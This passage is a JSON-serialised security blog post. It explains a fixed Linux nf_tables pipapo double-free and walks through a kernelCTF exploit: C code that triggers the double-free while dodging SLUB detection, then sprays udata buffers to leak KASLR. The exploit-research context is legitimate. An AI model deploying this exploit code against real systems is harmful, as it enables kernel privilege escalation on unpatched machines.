uncommitted elements, it's crucial to free what's in the clone.",{"type":25,"tag":38,"props":58099,"children":58100},{},[58101,58103,58109,58111,58116,58118,58123],{"type":31,"value":58102},"When this code was introduced, it was only reachable from the abort path because it was the only path where ",{"type":25,"tag":82,"props":58104,"children":58106},{"className":58105},[],[58107],{"type":31,"value":58108},"set->ops->destroy()",{"type":31,"value":58110}," could be called without clearing the ",{"type":25,"tag":82,"props":58112,"children":58114},{"className":58113},[],[58115],{"type":31,"value":54942},{"type":31,"value":58117}," flag, which was fine considering you didn't have duplicated views of the ",{"type":25,"tag":82,"props":58119,"children":58121},{"className":58120},[],[58122],{"type":31,"value":54980},{"type":31,"value":58124},"s, so they would all be in the clone set.",{"type":25,"tag":38,"props":58126,"children":58127},{},[58128,58130,58135],{"type":31,"value":58129},"But when the ",{"type":25,"tag":82,"props":58131,"children":58133},{"className":58132},[],[58134],{"type":31,"value":57697},{"type":31,"value":58136}," flag was introduced, some assumptions about the commit path were changed. It created a new way of reaching this code while having already committed changes in the set. This means any already committed changes will have a view in the \"normal\" match object and one in the clone.",{"type":25,"tag":38,"props":58138,"children":58139},{},[58140],{"type":31,"value":58141},"The vulnerability was fixed by only deleting elements from the clone because the clone should have all views of committed and uncommitted changes, effectively eliminating the double-free vulnerability.",{"type":25,"tag":26,"props":58143,"children":58145},{"id":58144},"kernelctf-exploit",[58146],{"type":31,"value":58147},"KernelCTF exploit",{"type":25,"tag":38,"props":58149,"children":58150},{},[58151,58153,58159,58161,58168],{"type":31,"value":58152},"Now that we know the full story of the bug, let's look into how I exploited it in the KernelCTF LTS instance before getting into the universal exploit. A great deal of the exploit is based on the ",{"type":25,"tag":82,"props":58154,"children":58156},{"className":58155},[],[58157],{"type":31,"value":58158},"nft_object + udata",{"type":31,"value":58160}," technique shared by lonial con in a ",{"type":25,"tag":162,"props":58162,"children":58165},{"href":58163,"rel":58164},"https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md",[166],[58166],{"type":31,"value":58167},"previous kernelCTF exploit",{"type":31,"value":179},{"type":25,"tag":606,"props":58170,"children":58172},{"id":58171},"trigger-uafavoid-double-free-detection",[58173],{"type":31,"value":58174},"Trigger UAF/avoid double-free detection",{"type":25,"tag":38,"props":58176,"children":58177},{},[58178,58180,58186,58188,58194],{"type":31,"value":58179},"The SLUB allocator has a naive double-free detection mechanism to spot straightforward sequences, such as the same object being added to the free-list twice in a row without any other objects being added in between.\nAs we have seen, ",{"type":25,"tag":82,"props":58181,"children":58183},{"className":58182},[],[58184],{"type":31,"value":58185},"nft_set_pipapo_match_destroy",{"type":31,"value":58187}," iterates over the ",{"type":25,"tag":82,"props":58189,"children":58191},{"className":58190},[],[58192],{"type":31,"value":58193},"setelems",{"type":31,"value":58195}," in the set and frees each of them, so it should be relatively simple to avoid detection by having more than one element in the set, in which case the following will happen:",{"type":25,"tag":6711,"props":58197,"children":58198},{},[58199,58204,58209,58214],{"type":25,"tag":2043,"props":58200,"children":58201},{},[58202],{"type":31,"value":58203},"Element A gets freed",{"type":25,"tag":2043,"props":58205,"children":58206},{},[58207],{"type":31,"value":58208},"Element B gets free",{"type":25,"tag":2043,"props":58210,"children":58211},{},[58212],{"type":31,"value":58213},"Element A gets freed again (double-free)",{"type":25,"tag":2043,"props":58215,"children":58216},{},[58217],{"type":31,"value":58218},"Element B gets freed again (double-free)",{"type":25,"tag":206,"props":58220,"children":58222},{"className":33070,"code":58221,"language":33072,"meta":7,"style":7},"[...]\nstatic void trigger_uaf(struct mnl_socket *nl, size_t size, int *msgqids)\n{\n[...]\n    // TRANSACTION 2\n[...]\n\n    // create pipapo set\n    uint8_t desc[2] = {16, 16};\n    set = create_set(\n        batch, seq++, exploit_table_name, \"pwn_set\", 0x1337,\n        NFT_SET_INTERVAL | NFT_SET_OBJECT | NFT_SET_CONCAT, KEY_LEN, 2, &desc, NULL, 0, NFT_OBJECT_CT_EXPECT);\n\n    // commit 2 elems to set (elems A and B that will be double-freed)\n    for (int i = 0; i \u003C 2; i++)\n    {\n        elem[i] = nftnl_set_elem_alloc();\n        memset(key, 0x41 + i, KEY_LEN);\n        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_OBJREF, \"pwnobj\", 7);\n        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);\n        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_USERDATA, &udata_buf, size);\n        nftnl_set_elem_add(set, elem[i]);\n    }\n[...]\n\n    // TRANSACTION 3\n[...]\n    set = nftnl_set_alloc();\n    nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);\n    nftnl_set_set_str(set, NFTNL_SET_TABLE, exploit_table_name);\n    nftnl_set_set_str(set, NFTNL_SET_NAME, \"pwn_set\");\n\n    // make priv->dirty true\n    memset(key, 0xff, KEY_LEN);\n    elem[3] = nftnl_set_elem_alloc();\n    nftnl_set_elem_set(elem[3], NFTNL_SET_ELEM_OBJREF, \"pwnobj\", 7);\n    nftnl_set_elem_set(elem[3], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);\n    nftnl_set_elem_add(set, elem[3]);\n[...]\n\n    // double-free commited elems\n[...]\n    nftnl_set_free(set);\n}\n[...]\n",[58223],{"type":25,"tag":82,"props":58224,"children":58225},{"__ignoreMap":7},[58226,58233,58294,58301,58308,58316,58323,58330,58338,58362,58383,58417,58478,58485,58493,58545,58552,58578,58605,58644,58673,58702,58724,58731,58738,58745,58753,58760,58768,58781,58794,58814,58821,58829,58851,58883,58928,58964,58992,58999,59006,59014,59021,59037,59044],{"type":25,"tag":216,"props":58227,"children":58228},{"class":6922,"line":6923},[58229],{"type":25,"tag":216,"props":58230,"children":58231},{"style":6964},[58232],{"type":31,"value":14275},{"type":25,"tag":216,"props":58234,"children":58235},{"class":6922,"line":6769},[58236,58241,58245,58250,58254,58259,58263,58268,58273,58277,58281,58285,58290],{"type":25,"tag":216,"props":58237,"children":58238},{"style":6964},[58239],{"type":31,"value":58240},"static void trigger_uaf(",{"type":25,"tag":216,"props":58242,"children":58243},{"style":6936},[58244],{"type":31,"value":13357},{"type":25,"tag":216,"props":58246,"children":58247},{"style":7375},[58248],{"type":31,"value":58249}," mnl_socket",{"type":25,"tag":216,"props":58251,"children":58252},{"style":6936},[58253],{"type":31,"value":13773},{"type":25,"tag":216,"props":58255,"children":58256},{"style":6947},[58257],{"type":31,"value":58258},"nl",{"type":25,"tag":216,"props":58260,"children":58261},{"style":6964},[58262],{"type":31,"value":7026},{"type":25,"tag":216,"props":58264,"children":58265},{"style":6936},[58266],{"type":31,"value":58267},"size_t",{"type":25,"tag":216,"props":58269,"children":58270},{"style":6947},[58271],{"type":31,"value":58272}," size",{"type":25,"tag":216,"props":58274,"children":58275},{"style":6964},[58276],{"type":31,"value":7026},{"type":25,"tag":216,"props":58278,"children":58279},{"style":6936},[58280],{"type":31,"value":23007},{"type":25,"tag":216,"props":58282,"children":58283},{"style":6936},[58284],{"type":31,"value":13773},{"type":25,"tag":216,"props":58286,"children":58287},{"style":6947},[58288],{"type":31,"value":58289},"msgqids",{"type":25,"tag":216,"props":58291,"children":58292},{"style":6964},[58293],{"type":31,"value":7107},{"type":25,"tag":216,"props":58295,"children":58296},{"class":6922,"line":6778},[58297],{"type":25,"tag":216,"props":58298,"children":58299},{"style":6964},[58300],{"type":31,"value":14836},{"type":25,"tag":216,"props":58302,"children":58303},{"class":6922,"line":7005},[58304],{"type":25,"tag":216,"props":58305,"children":58306},{"style":6964},[58307],{"type":31,"value":14275},{"type":25,"tag":216,"props":58309,"children":58310},{"class":6922,"line":7110},[58311],{"type":25,"tag":216,"props":58312,"children":58313},{"style":6964},[58314],{"type":31,"value":58315},"    // TRANSACTION 2\n",{"type":25,"tag":216,"props":58317,"children":58318},{"class":6922,"line":7216},[58319],{"type":25,"tag":216,"props":58320,"children":58321},{"style":6964},[58322],{"type":31,"value":14275},{"type":25,"tag":216,"props":58324,"children":58325},{"class":6922,"line":7244},[58326],{"type":25,"tag":216,"props":58327,"children":58328},{"emptyLinePlaceholder":16},[58329],{"type":31,"value":7642},{"type":25,"tag":216,"props":58331,"children":58332},{"class":6922,"line":7257},[58333],{"type":25,"tag":216,"props":58334,"children":58335},{"style":6964},[58336],{"type":31,"value":58337},"    // create pipapo set\n",{"type":25,"tag":216,"props":58339,"children":58340},{"class":6922,"line":7275},[58341,58346,58350,58354,58358],{"type":25,"tag":216,"props":58342,"children":58343},{"style":6964},[58344],{"type":31,"value":58345},"    uint8_t desc[2] = {",{"type":25,"tag":216,"props":58347,"children":58348},{"style":6989},[58349],{"type":31,"value":44811},{"type":25,"tag":216,"props":58351,"children":58352},{"style":6964},[58353],{"type":31,"value":7026},{"type":25,"tag":216,"props":58355,"children":58356},{"style":6989},[58357],{"type":31,"value":44811},{"type":25,"tag":216,"props":58359,"children":58360},{"style":6964},[58361],{"type":31,"value":20536},{"type":25,"tag":216,"props":58363,"children":58364},{"class":6922,"line":7296},[58365,58370,58374,58379],{"type":25,"tag":216,"props":58366,"children":58367},{"style":6964},[58368],{"type":31,"value":58369},"    set ",{"type":25,"tag":216,"props":58371,"children":58372},{"style":6953},[58373],{"type":31,"value":266},{"type":25,"tag":216,"props":58375,"children":58376},{"style":7047},[58377],{"type":31,"value":58378}," create_set",{"type":25,"tag":216,"props":58380,"children":58381},{"style":6964},[58382],{"type":31,"value":7420},{"type":25,"tag":216,"props":58384,"children":58385},{"class":6922,"line":7305},[58386,58391,58395,58400,58405,58409,58413],{"type":25,"tag":216,"props":58387,"children":58388},{"style":6964},[58389],{"type":31,"value":58390},"        batch, seq",{"type":25,"tag":216,"props":58392,"children":58393},{"style":6953},[58394],{"type":31,"value":55238},{"type":25,"tag":216,"props":58396,"children":58397},{"style":6964},[58398],{"type":31,"value":58399},", exploit_table_name, ",{"type":25,"tag":216,"props":58401,"children":58402},{"style":8205},[58403],{"type":31,"value":58404},"\"pwn_set\"",{"type":25,"tag":216,"props":58406,"children":58407},{"style":6964},[58408],{"type":31,"value":7026},{"type":25,"tag":216,"props":58410,"children":58411},{"style":6989},[58412],{"type":31,"value":47468},{"type":25,"tag":216,"props":58414,"children":58415},{"style":6964},[58416],{"type":31,"value":7465},{"type":25,"tag":216,"props":58418,"children":58419},{"class":6922,"line":7557},[58420,58425,58429,58434,58438,58443,58447,58451,58455,58460,58465,58469,58473],{"type":25,"tag":216,"props":58421,"children":58422},{"style":6964},[58423],{"type":31,"value":58424},"        NFT_SET_INTERVAL ",{"type":25,"tag":216,"props":58426,"children":58427},{"style":6953},[58428],{"type":31,"value":14373},{"type":25,"tag":216,"props":58430,"children":58431},{"style":6964},[58432],{"type":31,"value":58433}," NFT_SET_OBJECT ",{"type":25,"tag":216,"props":58435,"children":58436},{"style":6953},[58437],{"type":31,"value":14373},{"type":25,"tag":216,"props":58439,"children":58440},{"style":6964},[58441],{"type":31,"value":58442}," NFT_SET_CONCAT, KEY_LEN, ",{"type":25,"tag":216,"props":58444,"children":58445},{"style":6989},[58446],{"type":31,"value":331},{"type":25,"tag":216,"props":58448,"children":58449},{"style":6964},[58450],{"type":31,"value":7026},{"type":25,"tag":216,"props":58452,"children":58453},{"style":6953},[58454],{"type":31,"value":7059},{"type":25,"tag":216,"props":58456,"children":58457},{"style":6964},[58458],{"type":31,"value":58459},"desc, ",{"type":25,"tag":216,"props":58461,"children":58462},{"style":6936},[58463],{"type":31,"value":58464},"NULL",{"type":25,"tag":216,"props":58466,"children":58467},{"style":6964},[58468],{"type":31,"value":7026},{"type":25,"tag":216,"props":58470,"children":58471},{"style":6989},[58472],{"type":31,"value":1882},{"type":25,"tag":216,"props":58474,"children":58475},{"style":6964},[58476],{"type":31,"value":58477},", NFT_OBJECT_CT_EXPECT);\n",{"type":25,"tag":216,"props":58479,"children":58480},{"class":6922,"line":7574},[58481],{"type":25,"tag":216,"props":58482,"children":58483},{"emptyLinePlaceholder":16},[58484],{"type":31,"value":7642},{"type":25,"tag":216,"props":58486,"children":58487},{"class":6922,"line":7591},[58488],{"type":25,"tag":216,"props":58489,"children":58490},{"style":6927},[58491],{"type":31,"value":58492},"    // commit 2 elems to set (elems A and B that will be double-freed)\n",{"type":25,"tag":216,"props":58494,"children":58495},{"class":6922,"line":7604},[58496,58500,58504,58508,58513,58517,58521,58525,58529,58533,58537,58541],{"type":25,"tag":216,"props":58497,"children":58498},{"style":6973},[58499],{"type":31,"value":6976},{"type":25,"tag":216,"props":58501,"children":58502},{"style":6964},[58503],{"type":31,"value":7016},{"type":25,"tag":216,"props":58505,"children":58506},{"style":6936},[58507],{"type":31,"value":23007},{"type":25,"tag":216,"props":58509,"children":58510},{"style":6964},[58511],{"type":31,"value":58512}," i ",{"type":25,"tag":216,"props":58514,"children":58515},{"style":6953},[58516],{"type":31,"value":266},{"type":25,"tag":216,"props":58518,"children":58519},{"style":6989},[58520],{"type":31,"value":6992},{"type":25,"tag":216,"props":58522,"children":58523},{"style":6964},[58524],{"type":31,"value":55202},{"type":25,"tag":216,"props":58526,"children":58527},{"style":6953},[58528],{"type":31,"value":9757},{"type":25,"tag":216,"props":58530,"children":58531},{"style":6989},[58532],{"type":31,"value":11886},{"type":25,"tag":216,"props":58534,"children":58535},{"style":6964},[58536],{"type":31,"value":55233},{"type":25,"tag":216,"props":58538,"children":58539},{"style":6953},[58540],{"type":31,"value":55238},{"type":25,"tag":216,"props":58542,"children":58543},{"style":6964},[58544],{"type":31,"value":7107},{"type":25,"tag":216,"props":58546,"children":58547},{"class":6922,"line":7613},[58548],{"type":25,"tag":216,"props":58549,"children":58550},{"style":6964},[58551],{"type":31,"value":33147},{"type":25,"tag":216,"props":58553,"children":58554},{"class":6922,"line":7636},[58555,58560,58565,58569,58574],{"type":25,"tag":216,"props":58556,"children":58557},{"style":6947},[58558],{"type":31,"value":58559},"        elem",{"type":25,"tag":216,"props":58561,"children":58562},{"style":6964},[58563],{"type":31,"value":58564},"[i] ",{"type":25,"tag":216,"props":58566,"children":58567},{"style":6953},[58568],{"type":31,"value":266},{"type":25,"tag":216,"props":58570,"children":58571},{"style":7047},[58572],{"type":31,"value":58573}," nftnl_set_elem_alloc",{"type":25,"tag":216,"props":58575,"children":58576},{"style":6964},[58577],{"type":31,"value":7633},{"type":25,"tag":216,"props":58579,"children":58580},{"class":6922,"line":7645},[58581,58586,58591,58596,58600],{"type":25,"tag":216,"props":58582,"children":58583},{"style":7047},[58584],{"type":31,"value":58585},"        memset",{"type":25,"tag":216,"props":58587,"children":58588},{"style":6964},[58589],{"type":31,"value":58590},"(key, ",{"type":25,"tag":216,"props":58592,"children":58593},{"style":6989},[58594],{"type":31,"value":58595},"0x41",{"type":25,"tag":216,"props":58597,"children":58598},{"style":6953},[58599],{"type":31,"value":12858},{"type":25,"tag":216,"props":58601,"children":58602},{"style":6964},[58603],{"type":31,"value":58604}," i, KEY_LEN);\n",{"type":25,"tag":216,"props":58606,"children":58607},{"class":6922,"line":7654},[58608,58613,58617,58621,58626,58631,58635,58640],{"type":25,"tag":216,"props":58609,"children":58610},{"style":7047},[58611],{"type":31,"value":58612},"        nftnl_set_elem_set",{"type":25,"tag":216,"props":58614,"children":58615},{"style":6964},[58616],{"type":31,"value":1850},{"type":25,"tag":216,"props":58618,"children":58619},{"style":6947},[58620],{"type":31,"value":56032},{"type":25,"tag":216,"props":58622,"children":58623},{"style":6964},[58624],{"type":31,"value":58625},"[i], NFTNL_SET_ELEM_OBJREF, ",{"type":25,"tag":216,"props":58627,"children":58628},{"style":8205},[58629],{"type":31,"value":58630},"\"pwnobj\"",{"type":25,"tag":216,"props":58632,"children":58633},{"style":6964},[58634],{"type":31,"value":7026},{"type":25,"tag":216,"props":58636,"children":58637},{"style":6989},[58638],{"type":31,"value":58639},"7",{"type":25,"tag":216,"props":58641,"children":58642},{"style":6964},[58643],{"type":31,"value":7797},{"type":25,"tag":216,"props":58645,"children":58646},{"class":6922,"line":7722},[58647,58651,58655,58659,58664,58668],{"type":25,"tag":216,"props":58648,"children":58649},{"style":7047},[58650],{"type":31,"value":58612},{"type":25,"tag":216,"props":58652,"children":58653},{"style":6964},[58654],{"type":31,"value":1850},{"type":25,"tag":216,"props":58656,"children":58657},{"style":6947},[58658],{"type":31,"value":56032},{"type":25,"tag":216,"props":58660,"children":58661},{"style":6964},[58662],{"type":31,"value":58663},"[i], NFTNL_SET_ELEM_KEY, ",{"type":25,"tag":216,"props":58665,"children":58666},{"style":6953},[58667],{"type":31,"value":7059},{"type":25,"tag":216,"props":58669,"children":58670},{"style":6964},[58671],{"type":31,"value":58672},"key, KEY_LEN);\n",{"type":25,"tag":216,"props":58674,"children":58675},{"class":6922,"line":7730},[58676,58680,58684,58688,58693,58697],{"type":25,"tag":216,"props":58677,"children":58678},{"style":7047},[58679],{"type":31,"value":58612},{"type":25,"tag":216,"props":58681,"children":58682},{"style":6964},[58683],{"type":31,"value":1850},{"type":25,"tag":216,"props":58685,"children":58686},{"style":6947},[58687],{"type":31,"value":56032},{"type":25,"tag":216,"props":58689,"children":58690},{"style":6964},[58691],{"type":31,"value":58692},"[i], NFTNL_SET_ELEM_USERDATA, ",{"type":25,"tag":216,"props":58694,"children":58695},{"style":6953},[58696],{"type":31,"value":7059},{"type":25,"tag":216,"props":58698,"children":58699},{"style":6964},[58700],{"type":31,"value":58701},"udata_buf, size);\n",{"type":25,"tag":216,"props":58703,"children":58704},{"class":6922,"line":7760},[58705,58710,58715,58719],{"type":25,"tag":216,"props":58706,"children":58707},{"style":7047},[58708],{"type":31,"value":58709},"        nftnl_set_elem_add",{"type":25,"tag":216,"props":58711,"children":58712},{"style":6964},[58713],{"type":31,"value":58714},"(set, ",{"type":25,"tag":216,"props":58716,"children":58717},{"style":6947},[58718],{"type":31,"value":56032},{"type":25,"tag":216,"props":58720,"children":58721},{"style":6964},[58722],{"type":31,"value":58723},"[i]);\n",{"type":25,"tag":216,"props":58725,"children":58726},{"class":6922,"line":7768},[58727],{"type":25,"tag":216,"props":58728,"children":58729},{"style":6964},[58730],{"type":31,"value":7311},{"type":25,"tag":216,"props":58732,"children":58733},{"class":6922,"line":7800},[58734],{"type":25,"tag":216,"props":58735,"children":58736},{"style":6964},[58737],{"type":31,"value":14275},{"type":25,"tag":216,"props":58739,"children":58740},{"class":6922,"line":7808},[58741],{"type":25,"tag":216,"props":58742,"children":58743},{"emptyLinePlaceholder":16},[58744],{"type":31,"value":7642},{"type":25,"tag":216,"props":58746,"children":58747},{"class":6922,"line":7868},[58748],{"type":25,"tag":216,"props":58749,"children":58750},{"style":6964},[58751],{"type":31,"value":58752},"    // TRANSACTION 3\n",{"type":25,"tag":216,"props":58754,"children":58755},{"class":6922,"line":13001},[58756],{"type":25,"tag":216,"props":58757,"children":58758},{"style":6964},[58759],{"type":31,"value":14275},{"type":25,"tag":216,"props":58761,"children":58762},{"class":6922,"line":13019},[58763],{"type":25,"tag":216,"props":58764,"children":58765},{"style":6964},[58766],{"type":31,"value":58767},"    set = nftnl_set_alloc();\n",{"type":25,"tag":216,"props":58769,"children":58770},{"class":6922,"line":13064},[58771,58776],{"type":25,"tag":216,"props":58772,"children":58773},{"style":7047},[58774],{"type":31,"value":58775},"    nftnl_set_set_u32",{"type":25,"tag":216,"props":58777,"children":58778},{"style":6964},[58779],{"type":31,"value":58780},"(set, NFTNL_SET_FAMILY, family);\n",{"type":25,"tag":216,"props":58782,"children":58783},{"class":6922,"line":13170},[58784,58789],{"type":25,"tag":216,"props":58785,"children":58786},{"style":7047},[58787],{"type":31,"value":58788},"    nftnl_set_set_str",{"type":25,"tag":216,"props":58790,"children":58791},{"style":6964},[58792],{"type":31,"value":58793},"(set, NFTNL_SET_TABLE, exploit_table_name);\n",{"type":25,"tag":216,"props":58795,"children":58796},{"class":6922,"line":27455},[58797,58801,58806,58810],{"type":25,"tag":216,"props":58798,"children":58799},{"style":7047},[58800],{"type":31,"value":58788},{"type":25,"tag":216,"props":58802,"children":58803},{"style":6964},[58804],{"type":31,"value":58805},"(set, NFTNL_SET_NAME, ",{"type":25,"tag":216,"props":58807,"children":58808},{"style":8205},[58809],{"type":31,"value":58404},{"type":25,"tag":216,"props":58811,"children":58812},{"style":6964},[58813],{"type":31,"value":7797},{"type":25,"tag":216,"props":58815,"children":58816},{"class":6922,"line":27490},[58817],{"type":25,"tag":216,"props":58818,"children":58819},{"emptyLinePlaceholder":16},[58820],{"type":31,"value":7642},{"type":25,"tag":216,"props":58822,"children":58823},{"class":6922,"line":27498},[58824],{"type":25,"tag":216,"props":58825,"children":58826},{"style":6927},[58827],{"type":31,"value":58828},"    // make priv->dirty true\n",{"type":25,"tag":216,"props":58830,"children":58831},{"class":6922,"line":27506},[58832,58837,58841,58846],{"type":25,"tag":216,"props":58833,"children":58834},{"style":7047},[58835],{"type":31,"value":58836},"    memset",{"type":25,"tag":216,"props":58838,"children":58839},{"style":6964},[58840],{"type":31,"value":58590},{"type":25,"tag":216,"props":58842,"children":58843},{"style":6989},[58844],{"type":31,"value":58845},"0xff",{"type":25,"tag":216,"props":58847,"children":58848},{"style":6964},[58849],{"type":31,"value":58850},", KEY_LEN);\n",{"type":25,"tag":216,"props":58852,"children":58853},{"class":6922,"line":27515},[58854,58859,58863,58867,58871,58875,58879],{"type":25,"tag":216,"props":58855,"children":58856},{"style":6947},[58857],{"type":31,"value":58858},"    elem",{"type":25,"tag":216,"props":58860,"children":58861},{"style":6964},[58862],{"type":31,"value":7701},{"type":25,"tag":216,"props":58864,"children":58865},{"style":6989},[58866],{"type":31,"value":21253},{"type":25,"tag":216,"props":58868,"children":58869},{"style":6964},[58870],{"type":31,"value":12614},{"type":25,"tag":216,"props":58872,"children":58873},{"style":6953},[58874],{"type":31,"value":266},{"type":25,"tag":216,"props":58876,"children":58877},{"style":7047},[58878],{"type":31,"value":58573},{"type":25,"tag":216,"props":58880,"children":58881},{"style":6964},[58882],{"type":31,"value":7633},{"type":25,"tag":216,"props":58884,"children":58885},{"class":6922,"line":27557},[58886,58891,58895,58899,58903,58907,58912,58916,58920,58924],{"type":25,"tag":216,"props":58887,"children":58888},{"style":7047},[58889],{"type":31,"value":58890},"    nftnl_set_elem_set",{"type":25,"tag":216,"props":58892,"children":58893},{"style":6964},[58894],{"type":31,"value":1850},{"type":25,"tag":216,"props":58896,"children":58897},{"style":6947},[58898],{"type":31,"value":56032},{"type":25,"tag":216,"props":58900,"children":58901},{"style":6964},[58902],{"type":31,"value":7701},{"type":25,"tag":216,"props":58904,"children":58905},{"style":6989},[58906],{"type":31,"value":21253},{"type":25,"tag":216,"props":58908,"children":58909},{"style":6964},[58910],{"type":31,"value":58911},"], NFTNL_SET_ELEM_OBJREF, ",{"type":25,"tag":216,"props":58913,"children":58914},{"style":8205},[58915],{"type":31,"value":58630},{"type":25,"tag":216,"props":58917,"children":58918},{"style":6964},[58919],{"type":31,"value":7026},{"type":25,"tag":216,"props":58921,"children":58922},{"style":6989},[58923],{"type":31,"value":58639},{"type":25,"tag":216,"props":58925,"children":58926},{"style":6964},[58927],{"type":31,"value":7797},{"type":25,"tag":216,"props":58929,"children":58930},{"class":6922,"line":27590},[58931,58935,58939,58943,58947,58951,58956,58960],{"type":25,"tag":216,"props":58932,"children":58933},{"style":7047},[58934],{"type":31,"value":58890},{"type":25,"tag":216,"props":58936,"children":58937},{"style":6964},[58938],{"type":31,"value":1850},{"type":25,"tag":216,"props":58940,"children":58941},{"style":6947},[58942],{"type":31,"value":56032},{"type":25,"tag":216,"props":58944,"children":58945},{"style":6964},[58946],{"type":31,"value":7701},{"type":25,"tag":216,"props":58948,"children":58949},{"style":6989},[58950],{"type":31,"value":21253},{"type":25,"tag":216,"props":58952,"children":58953},{"style":6964},[58954],{"type":31,"value":58955},"], NFTNL_SET_ELEM_KEY, ",{"type":25,"tag":216,"props":58957,"children":58958},{"style":6953},[58959],{"type":31,"value":7059},{"type":25,"tag":216,"props":58961,"children":58962},{"style":6964},[58963],{"type":31,"value":58672},{"type":25,"tag":216,"props":58965,"children":58966},{"class":6922,"line":27598},[58967,58972,58976,58980,58984,58988],{"type":25,"tag":216,"props":58968,"children":58969},{"style":7047},[58970],{"type":31,"value":58971},"    nftnl_set_elem_add",{"type":25,"tag":216,"props":58973,"children":58974},{"style":6964},[58975],{"type":31,"value":58714},{"type":25,"tag":216,"props":58977,"children":58978},{"style":6947},[58979],{"type":31,"value":56032},{"type":25,"tag":216,"props":58981,"children":58982},{"style":6964},[58983],{"type":31,"value":7701},{"type":25,"tag":216,"props":58985,"children":58986},{"style":6989},[58987],{"type":31,"value":21253},{"type":25,"tag":216,"props":58989,"children":58990},{"style":6964},[58991],{"type":31,"value":7719},{"type":25,"tag":216,"props":58993,"children":58994},{"class":6922,"line":27606},[58995],{"type":25,"tag":216,"props":58996,"children":58997},{"style":6964},[58998],{"type":31,"value":14275},{"type":25,"tag":216,"props":59000,"children":59001},{"class":6922,"line":27615},[59002],{"type":25,"tag":216,"props":59003,"children":59004},{"emptyLinePlaceholder":16},[59005],{"type":31,"value":7642},{"type":25,"tag":216,"props":59007,"children":59008},{"class":6922,"line":27691},[59009],{"type":25,"tag":216,"props":59010,"children":59011},{"style":6964},[59012],{"type":31,"value":59013},"    // double-free commited elems\n",{"type":25,"tag":216,"props":59015,"children":59016},{"class":6922,"line":27724},[59017],{"type":25,"tag":216,"props":59018,"children":59019},{"style":6964},[59020],{"type":31,"value":14275},{"type":25,"tag":216,"props":59022,"children":59023},{"class":6922,"line":27732},[59024,59029,59033],{"type":25,"tag":216,"props":59025,"children":59026},{"style":6964},[59027],{"type":31,"value":59028},"    nftnl_set_free(",{"type":25,"tag":216,"props":59030,"children":59031},{"style":7375},[59032],{"type":31,"value":54988},{"type":25,"tag":216,"props":59034,"children":59035},{"style":6964},[59036],{"type":31,"value":7797},{"type":25,"tag":216,"props":59038,"children":59039},{"class":6922,"line":27740},[59040],{"type":25,"tag":216,"props":59041,"children":59042},{"style":6964},[59043],{"type":31,"value":7874},{"type":25,"tag":216,"props":59045,"children":59046},{"class":6922,"line":27777},[59047],{"type":25,"tag":216,"props":59048,"children":59049},{"style":6964},[59050],{"type":31,"value":14275},{"type":25,"tag":606,"props":59052,"children":59054},{"id":59053},"leaking-kaslr",[59055],{"type":31,"value":59056},"Leaking KASLR",{"type":25,"tag":38,"props":59058,"children":59059},{},[59060,59062,59068,59070,59075,59077,59083,59085,59091,59093],{"type":31,"value":59061},"Tables contain an outline user data buffer ",{"type":25,"tag":82,"props":59063,"children":59065},{"className":59064},[],[59066],{"type":31,"value":59067},"udata",{"type":31,"value":59069}," that we can both read and write. By allocating a ",{"type":25,"tag":82,"props":59071,"children":59073},{"className":59072},[],[59074],{"type":31,"value":59067},{"type":31,"value":59076}," buffer on the double-free slot and then overlapping it with an ",{"type":25,"tag":82,"props":59078,"children":59080},{"className":59079},[],[59081],{"type":31,"value":59082},"nft_object",{"type":31,"value":59084}," we can leak the ",{"type":25,"tag":82,"props":59086,"children":59088},{"className":59087},[],[59089],{"type":31,"value":59090},"->ops",{"type":31,"value":59092}," pointer, and use it to calculate the KASLR slide.\n",{"type":25,"tag":6467,"props":59094,"children":59096},{"alt":54547,"src":59095},"/posts/netfilter-universal-root-1-day/kaslr.png",[],{"type":25,"tag":206,"props":59098,"children":59100},{"className":33070,"code":59099,"language":33072,"meta":7,"style":7},"[...]\n    // spray 3 udata buffers to consume elems A, B and A again\n    udata_spray(nl, 0xe8, 0, 3, NULL);\n\n    // check if overlap happened (i.e if we have to overlapping udata buffers)\n    char spray_name[16];\n    char *udata[3];\n    for (int i = 0; i \u003C 3; i++)\n    {\n        snprintf(spray_name, sizeof(spray_name), \"spray-%i\", i);\n        udata[i] = getudata(nl, spray_name);\n    }\n    if (udata[0][0] == udata[2][0])\n    {\n        puts(\"[+] got duplicated table\");\n    }\n\n    // Replace one of the udata buffers with nft_object\n    // and read it's counterpart to leak the nft_object struct\n    puts(\"[*] Info leak\");\n    deludata_spray(nl, 0, 1);\n    wait_destroyer();\n    obj_spray(nl, 0, 1, NULL, 0);\n    uint64_t *fake_obj = (uint64_t *)getudata(nl, \"spray-2\");\n[...]\n",[59101],{"type":25,"tag":82,"props":59102,"children":59103},{"__ignoreMap":7},[59104,59111,59119,59154,59161,59169,59194,59221,59272,59279,59312,59338,59345,59410,59417,59438,59445,59452,59460,59468,59489,59518,59530,59574,59630],{"type":25,"tag":216,"props":59105,"children":59106},{"class":6922,"line":6923},[59107],{"type":25,"tag":216,"props":59108,"children":59109},{"style":6964},[59110],{"type":31,"value":14275},{"type":25,"tag":216,"props":59112,"children":59113},{"class":6922,"line":6769},[59114],{"type":25,"tag":216,"props":59115,"children":59116},{"style":6964},[59117],{"type":31,"value":59118},"    // spray 3 udata buffers to consume elems A, B and A again\n",{"type":25,"tag":216,"props":59120,"children":59121},{"class":6922,"line":6778},[59122,59127,59131,59136,59141,59146,59150],{"type":25,"tag":216,"props":59123,"children":59124},{"style":6964},[59125],{"type":31,"value":59126},"    udata_spray(",{"type":25,"tag":216,"props":59128,"children":59129},{"style":7375},[59130],{"type":31,"value":58258},{"type":25,"tag":216,"props":59132,"children":59133},{"style":6964},[59134],{"type":31,"value":59135},", 0",{"type":25,"tag":216,"props":59137,"children":59138},{"style":7375},[59139],{"type":31,"value":59140},"xe8",{"type":25,"tag":216,"props":59142,"children":59143},{"style":6964},[59144],{"type":31,"value":59145},", 0, 3, 